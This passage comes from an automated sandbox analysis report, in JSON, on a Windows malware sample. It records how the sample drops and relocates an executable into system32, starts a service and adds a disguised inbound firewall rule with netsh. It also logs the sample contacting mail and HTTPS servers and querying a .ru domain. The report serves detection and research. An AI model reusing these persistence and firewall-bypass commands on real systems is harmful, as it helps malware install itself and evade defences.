00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start dzhrysuy\" - (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005864)\n \"hfopyujf.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002240)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hfopyujf.exe\" %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00005952)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has an executable section named \".text\"\n \"hfopyujf.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67EE5D5B.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has an writable section named \".data\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has an writable section named \".text\"\n \"hfopyujf.exe\" has an writable section named \".data\"\n \"hfopyujf.exe\" has an writable section named \".text\"\n \"DISMHOST.EXE.67EE5D5B.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xa2e000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xd68000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"hfopyujf.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67EE5D5B.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" was detected as \"VC8 -> Microsoft Corporation\"\n \"hfopyujf.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67EE5D5B.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"hfopyujf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hfopyujf.exe]- [targetUID: 00000000-00005864]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"hfopyujf.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" reads file \"c:\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SHELLCOMPATIBILITY\\APPLICATIONS\\120894E1A20DE2FEFB24647FA436890FF581A6E33945E1A17664606E16EAB5B4.EXE\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"CONSENTPROMPTBEHAVIORADMIN\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"PROMPTONSECUREDESKTOP\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"120894E1A20DE2FEFB24647FA436890FF581A6E33945E1A17664606E16EAB5B4\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe.Local\\\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\120894E1A20DE2FEFB24647FA436890FF581A6E33945E1A17664606E16EAB5B4.EXE.LOCAL\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hfopyujf.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"hfopyujf.exe.67EE4A7A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"hfopyujf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hfopyujf.exe]- [targetUID: 00000000-00005864]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67EE5D5B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"HFOPYUJF.EXE.67EE4A7B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hfopyujf.exe\" to \"%WINDIR%\\system32\\dzhrysuy\\hfopyujf.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-513810 [PID: 2780]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-1535148 [PID: 2780]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-2545217 [PID: 2780]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-2767085 [PID: 2780]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-3201923 [PID: 2780]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-3412223 [PID: 2780]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002780-00000105-4030359 [PID: 2780]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00002700-00000105-138262 [PID: 2700]", "origin": "API Call", 